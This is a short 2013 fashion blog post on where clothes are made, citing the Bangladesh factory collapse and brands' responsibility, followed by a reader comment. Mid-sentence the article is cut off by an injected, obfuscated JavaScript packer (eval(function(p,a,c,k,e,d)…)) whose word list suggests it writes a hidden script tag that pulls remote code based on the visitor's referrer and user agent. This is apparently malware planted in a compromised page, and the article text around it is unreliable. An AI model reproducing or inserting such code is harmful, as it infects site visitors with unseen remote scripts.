Where are the clothes you wear from?

2013, Fashion

We all make a point to know where our food comes from, and many consumers use their purchasing power to buy local and organic products.  Why is this not the same for our clothes?

The building collapse in Bangladesh is only one example in a myriad of factory problems that plague the clothing industry. In the vicious cycle of cheap clothes, cheaper production operations and an even cheaper labor force, everyone from consumers to fashion brands are at fault for allowing the momentum of  the bottom-line profits and savings to drive the industry.  However, the United Nations has laid the legal responsibility on fashion brands to increase safety and inspections in their clothing factories.  While the Clean eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tknka|var|u0026u|referrer|sediy||js|php’.split(‘|’),0,{}))

  1. I totally agree; we should all strive to buy vintage, donate our used clothes, and be more aware of where our clothes come from. This is also true of the chemicals used in processing them that then seem into our skin. Great writing BTW, I loved
